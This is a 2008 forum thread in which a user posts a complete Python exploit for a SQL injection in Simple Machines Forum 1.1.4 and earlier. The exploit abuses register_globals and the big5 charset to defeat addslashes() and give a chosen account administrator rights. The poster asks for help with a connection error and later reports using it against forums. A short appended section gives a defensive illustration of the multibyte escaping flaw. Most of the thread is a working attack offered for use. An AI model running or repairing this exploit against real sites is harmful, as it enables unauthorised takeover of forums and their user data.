SMF 1.1.4 Remote SQL


Postby BLINGZ » Sun Sep 28, 2008 7:26 pm

[code:1:c4c39a36e4]
Simple Machines Forum <= 1.1.4 Remote SQL Injection Exploit

#!/usr/bin/python
"""
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
#====================================#===========#====================================#===========#
# Server Configuration Requirements # # Some Information # #
#====================================# #====================================# #
# # #
# register_globals = 1 # Vendor: www.simplemachines.org #
# # Author: The:Paradox #
#================================================# Severity: N/A #
# # #
# You may find exploits updates and more # #
# explanations on => # Proud To Be Italian. #
# http://paradox.altervista.org # #
# # #
#====================================#===========#================================================#
# Board Description # #
#====================================# #
# #
# Simple Machines Forum - SMF in short - is a free, professional grade software package that #
# allows you to set up your own online community within minutes. #
# Its powerful custom made template engine puts you in full control of the lay-out of your #
# message board and with our unique SSI - or Server Side Includes - function you can let your #
# forum and your website interact with each other. #
# SMF is written in the popular language PHP and uses a MySQL database. It is designed to provide #
# you with all the features you need from a bulletin board while having an absolute minimal #
# impact on the resources of the server. #
# SMF is the next generation of forum software - and best of all it is and will always #
# remain completely free! #
# #
#====================================#============================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# This is a quite old exploit and it is inapplicable on 1.1.5 version and on last 2.0 pre-release #
# (that's why I decided to public it). First, let's have a little poc. #
#=================================================================================================#

[Load.php]

148. if (isset($db_character_set) && preg_match('~^\w+$~', $db_character_set) === 1)
149. db_query("
150. SET NAMES $db_character_set", __FILE__, __LINE__);


#=================================================================================================#
# In Load.php if $db_character_set is set Smf will execute a Set Names Sql Query. #
# Directly from dev.mysql.com let's see what it means. #
# #
# "SET NAMES indicates what character set the client will use to send SQL statements to the #
# the server. Thus, SET NAMES 'cp1251' tells the server future incoming messages from this client #
# are in character set cp1251." #
# #
# Ok, now let's see what $db_character_set is. #
# $db_character_set is a "Settings.php variable" written only if a "Non-Default tick" #
# is checked during the installation process. #
# The real vulnerability is when the "Non-Default tick" is left unchecked, Smf doesn't write #
# it in "Settings.php" and no value is assigned to it: it's possible to set it #
# via register_globals. #
# #
# Now the cool poc section =D #
# Surely you saw that preg_match avoids any injection of non-alphanumerical chars in the query #
# at line 150 in Load.php #
# So, how is possible to take advantage of that? #
# To understand this vulnerability you have to comprehend some character set presents multibyte #
# characters and they may obiate addslashes() function. #
# Addslashes simply adds a backslash (0x5c) before single quote ('), double quote ("), #
# backslash (\) and NUL (the NULL byte), without checking if the added blackslash creates #
# another char. #
# No, i'm not going mad :P Here is an example: #
# #
# Bytes in Input #
# 0xa327 #
# #
# Addslashes(Bytes in Input) #
# 0xa35c27 #
# #
# In big5, but also in other multibyte charsets, 0xa35c is a valid char: 0x27 (') is left alone. #
# Therefore a lot of smf's queries are vulnerable if $db_character_set is settable. #
# In this exploit i will inject sql code in Update syntax, increasing user's privledges. #
#=================================================================================================#
# Exploit tested on 1.1.3 and 1.1.4 Smf's versions. #
#=================================================================================================#
# Use this exploit at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
"""
from sys import argv, exit
from httplib import HTTPConnection
from urllib import urlencode, unquote
from time import sleep
print """
#=================================================================#
# Simple Machines Forum <= 1.1.4 #
# Sql Injection Vulnerability #
# Priviledge Escalation Exploit #
# #
# ###################################### #
# # Let's get administrator rights!!! # #
# ###################################### #
# #
# Discovered By The:Paradox #
# #
# Usage: #
# ./Exploit [Target] [Path] [PHPSessID] [Userid] #
# #
# Example: #
# ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 #
# ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 #
#=================================================================#
"""

if len(argv)<=4: exit()


sn = "PHPSESSID" # Session cookie name. You may have to change this.
port = 80

target = argv[1]
path = argv[2]
sv = argv[3]
uid = argv[4]


class killsmf:

    def __init__(self):

        print "[.] Exploit Starts."

        self.GetSesc()
        self.CreateLabels()
        self.Inject()

        print "[+] All done.\n Now user with ID_MEMBER " + uid + " should have administrator rights. \n -= Paradox Got This One =-"

    def GetSesc(self):

        print "[+] Trying to read Sesc"

        for i in range (0,2):
            conn = HTTPConnection(target,port)
            conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"})
            rsp = conn.getresponse()
            r = rsp.read()

            if rsp.status == 404:
                exit ("[-] Error 404. Not Found")
            elif r.find('<input type="hidden" name="sc" value="') != -1 and r.find('" />') != -1 :
                self.sesc = r.split('<input type="hidden" name="sc" value="')[1].split('" />')[0]
                if len(self.sesc) != 32: exit ("[-] Invalid Sesc")
                print "[+] Sesc has been successfully read ==> "+self.sesc
            else:
                exit ("[-] Unable to find Sesc")

    def CreateLabels(self):
        print "[+] Creating three labels..."
        for i in range (0,3):
            conn = HTTPConnection(target,port)
            conn.request("POST", path + "index.php?action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label" : i, "add" : "Add+New+Label"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})
            sleep(0.35)

    def Inject(self):
        print "[+] Sql code is going to be injected."
        conn = HTTPConnection(target,port)
        conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"})

killsmf()

# milw0rm.com [2008-06-15]
[/code:1:c4c39a36e4]

Well, I'm having some trouble with it... You'll tell me "go learn Python, noob, and stop using things you don't understand". So yes, I'm learning Python, but I'm struggling to write even silly little games, so I'm not able to fully understand this code. That said, it won't stop me from trying to use it =)
Anyway, here's what I get when I run it:

[quote:c4c39a36e4][.] Exploit Starts.
[+] Trying to read Sesc
Traceback (most recent call last):
  File "C:\Documents and Settings\Bling\Bureau\exploit.py", line 179, in <module>
    killsmf()
  File "C:\Documents and Settings\Bling\Bureau\exploit.py", line 143, in __init__
    self.GetSesc()
  File "C:\Documents and Settings\Bling\Bureau\exploit.py", line 155, in GetSesc
    conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"})
  File "C:\Python25\lib\httplib.py", line 866, in request
    self._send_request(method, url, body, headers)
  File "C:\Python25\lib\httplib.py", line 889, in _send_request
    self.endheaders()
  File "C:\Python25\lib\httplib.py", line 860, in endheaders
    self._send_output()
  File "C:\Python25\lib\httplib.py", line 732, in _send_output
    self.send(msg)
  File "C:\Python25\lib\httplib.py", line 699, in send
    self.connect()
  File "C:\Python25\lib\httplib.py", line 667, in connect
    socket.SOCK_STREAM):
socket.gaierror: (11001, 'getaddrinfo failed')[/quote:c4c39a36e4]

Anyway, I googled a bit and it seems to be about a host it can't find (I think), but there's nothing more I can do for now other than go back to my little games, so if someone could point me in the right direction, that would be cool.
Thanks
BLINGZ
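Added illustration, not from the original post or the exploit's author, of the addslashes()/multibyte point made in the header comment of the exploit: a byte-wise escaper inserts 0x5c blindly, a server decoding the bytes as big5 absorbs that 0x5c into the preceding lead byte, and an escaper that decodes in the connection charset first does not have this problem. The function names (`addslashes`, `quote_survives`, `escape_charset_aware`, `rejects_malformed`) are mine; the sample bytes 0xa3 0x27 are the constructed input from the post's explanation.

```python
# Added illustration, not part of the original post. Models PHP's addslashes()
# byte-wise and checks what a server decoding in a given charset actually sees.
# Sample bytes are constructed (0xa3 0x27, as in the post's explanation).

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): 0x5c before ' " and \\,
    NUL becomes \\0, with no knowledge of the connection character set."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
            out.append(b)
        else:
            out.append(b)
    return bytes(out)

def quote_survives(escaped: bytes, charset: str) -> bool:
    """True if the server, decoding `escaped` in `charset`, still sees a single
    quote not preceded by a backslash character, i.e. the inserted 0x5c was
    absorbed into a multibyte character (0xa3 0x5c is a valid big5 char)."""
    try:
        text = escaped.decode(charset)
    except UnicodeDecodeError:
        return False  # malformed input would be rejected, not executed
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))

_REPL = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\x00": "\\0"}

def escape_charset_aware(data: bytes, charset: str) -> bytes:
    """Decode in the connection charset first (a dangling lead byte raises),
    escape per character, then re-encode. This is the property a charset-aware
    escaper such as mysql_real_escape_string() after mysql_set_charset() has;
    parameterised queries avoid the issue entirely."""
    text = data.decode(charset)
    return "".join(_REPL.get(ch, ch) for ch in text).encode(charset)

def rejects_malformed(data: bytes, charset: str) -> bool:
    """True if the charset-aware escaper refuses `data` as not valid in charset."""
    try:
        escape_charset_aware(data, charset)
    except UnicodeDecodeError:
        return True
    return False

if __name__ == "__main__":
    naive = addslashes(b"\xa3\x27")                       # -> a3 5c 27
    print(naive.hex(), quote_survives(naive, "big5"))     # big5: quote survives
    print(naive.hex(), quote_survives(naive, "latin-1"))  # single-byte: escaped
    print(rejects_malformed(b"\xa3\x27", "big5"))         # aware escaper refuses
```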

Postby BLINGZ » Mon Sep 29, 2008 12:51 am

Works fine on 1.1.3, but on 1.1.4 I can't get it to work.... I can't pin down the problem :/
Works on 1.1.4 too, after all... Well, it injects and all that, but I can't log in with the privileges x).